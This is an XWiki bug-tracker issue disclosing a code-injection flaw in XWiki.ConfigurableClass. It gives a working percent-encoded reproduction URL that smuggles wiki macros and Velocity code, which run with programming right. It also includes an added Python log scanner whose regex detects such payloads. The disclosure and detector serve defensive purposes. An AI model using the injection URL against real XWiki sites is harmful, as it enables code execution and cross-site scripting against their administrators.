Details
Bug
Resolution: Fixed
Blocker
2.3
Unit
Unknown
N/A
N/A
Description
Steps to reproduce:
As an admin user, open <xwiki-host>/xwiki/bin/view/%22%3E%7B%7B%2Fhtml%7D%7D%7B%7Basync%20context%3D%22request/parameters%22%7D%7D%7B%7Bvelocity%7D%7D%23evaluate(%24request/eval)/?sheet=XWiki.ConfigurableClass&xpage=view&eval=$services.logging.getLogger(%22attacker%22).error(%22Attack%20success%20$hasProgramming%22) where <xwiki-host> is the URL of your XWiki installation.
Alternatively, as a user with edit right, first create a configurable section as, e.g., explained on XWIKI-21121.
Expected result:
The code in the URL is not executed.
Actual result:
A message like
2023-07-25 17:24:07,226 [org.xwiki.rendering.async.internal.AsyncRendererJob@778eca14([async, macro, xwiki:XWiki.ConfigurableClass, 8, author, xwiki:XWiki.Admin, rendering.restricted, false, request.parameters, {xpage=[Ljava.lang.String;@6d34dae1, sheet=[Ljava.lang.String;@7a1c53cf, eval=[Ljava.lang.String;@43bfe9cb}, secureDocument, xwiki:XWiki.ConfigurableClass, 459])] ERROR attacker - Attack success true
is logged, showing that the code has been executed with programming right.
For this attack to succeed, the user needs to have edit right on at least one configurable section, so this is not a remote code execution attack from guest. However, it is possible to trick an admin into visiting the URL to trigger the attack, e.g., by embedding the URL as an image in a comment.
Via the same attack vector, XSS is also possible.
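The injected payload in the reproduction URL is only visible after percent-decoding: the path carries XWiki macro delimiters (`{{/html}}`, `{{async ...}}`, `{{velocity}}`) and a Velocity `#evaluate` directive, and the `eval` request parameter carries the `$services` script call. The following detector, written for this issue and not part of XWiki, decodes request URLs from access-log lines (repeatedly, so double-encoding does not hide the syntax) and flags path or query values containing those tokens. The log lines, the combined-log format and the `SUSPICIOUS` token list are constructed assumptions; the flagged URL is the one from the steps to reproduce above.

```python
"""Flag XWiki macro / Velocity syntax in request URLs from access-log lines.

Added example for this issue; not XWiki project code.  The token list and
the sample log are constructed for the demonstration.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Tokens that have no legitimate reason to appear in a view URL path or in a
# request parameter: XWiki 2.x macro delimiters, Velocity directives and the
# script-service accessor.  Extend to taste; keep it narrow to limit noise.
SUSPICIOUS = re.compile(
    r"\{\{\s*/?\s*[a-z]+"      # {{html, {{/html, {{async, {{velocity ...
    r"|#evaluate|#set\s*\("    # Velocity directives that run arbitrary code
    r"|\$services\.",          # XWiki script services
    re.IGNORECASE,
)

# Combined-log request part, e.g. "GET /xwiki/bin/view/Main/WebHome HTTP/1.1"
LOG_REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

# URL from the steps to reproduce, without the host part.
ATTACK_URL = (
    "/xwiki/bin/view/%22%3E%7B%7B%2Fhtml%7D%7D%7B%7Basync%20context%3D%22request"
    "/parameters%22%7D%7D%7B%7Bvelocity%7D%7D%23evaluate(%24request/eval)/"
    "?sheet=XWiki.ConfigurableClass&xpage=view&eval=$services.logging"
    ".getLogger(%22attacker%22).error(%22Attack%20success%20$hasProgramming%22)"
)

# Constructed sample access log: two ordinary requests and the attack URL.
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Jul/2023:17:20:01 +0200] "GET /xwiki/bin/view/Main/WebHome HTTP/1.1" 200 5120',
    '10.0.0.5 - - [25/Jul/2023:17:22:14 +0200] "GET /xwiki/bin/view/XWiki/XWikiPreferences'
    '?editor=globaladmin&section=Presentation HTTP/1.1" 200 8811',
    '10.0.0.9 - - [25/Jul/2023:17:24:07 +0200] "GET ' + ATTACK_URL + ' HTTP/1.1" 200 3000',
]


def decode_fully(value, rounds=3):
    """Percent-decode until stable (bounded) so %2522 -> %22 -> " is caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_url(url):
    """Return [(location, token), ...] for every suspicious token in one URL.

    The path and each query parameter value are decoded separately, because a
    payload may sit in either (here: macros in the path, script in `eval`).
    """
    parts = urlsplit(url)
    findings = []
    for m in SUSPICIOUS.finditer(decode_fully(parts.path)):
        findings.append(("path", m.group(0)))
    # parse_qs already decodes once; decode_fully handles further layers.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for v in values:
            for m in SUSPICIOUS.finditer(decode_fully(v)):
                findings.append((f"query:{name}", m.group(0)))
    return findings


def scan_access_log(lines):
    """Return [(line_number, findings), ...] for log lines worth an alert."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_REQUEST.search(line)
        if not m:
            continue
        findings = inspect_url(m.group(1))
        if findings:
            hits.append((n, findings))
    return hits


if __name__ == "__main__":
    for n, findings in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: {findings}")
```

The detector deliberately looks at decoded values rather than the raw request string, because the macro syntax in the reproduction URL is entirely percent-encoded and a substring match on the raw line would miss it. It is a triage aid: a hit tells you which parameter carried the suspicious syntax, which is what you need when deciding whether a logged `ERROR attacker` line or an unexpected rendering came from a request like the one above.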
It seems that the vulnerable code has been introduced in XAADMINISTRATION-112 which seems to have been released in XWiki 2.3, see https://www.xwiki.org/xwiki/bin/view/ReleaseNotes/ReleaseNotesXWikiEnterprise23#HEasierdevelopmentofconfigurableapplicationsusingXWiki.ConfigurableClass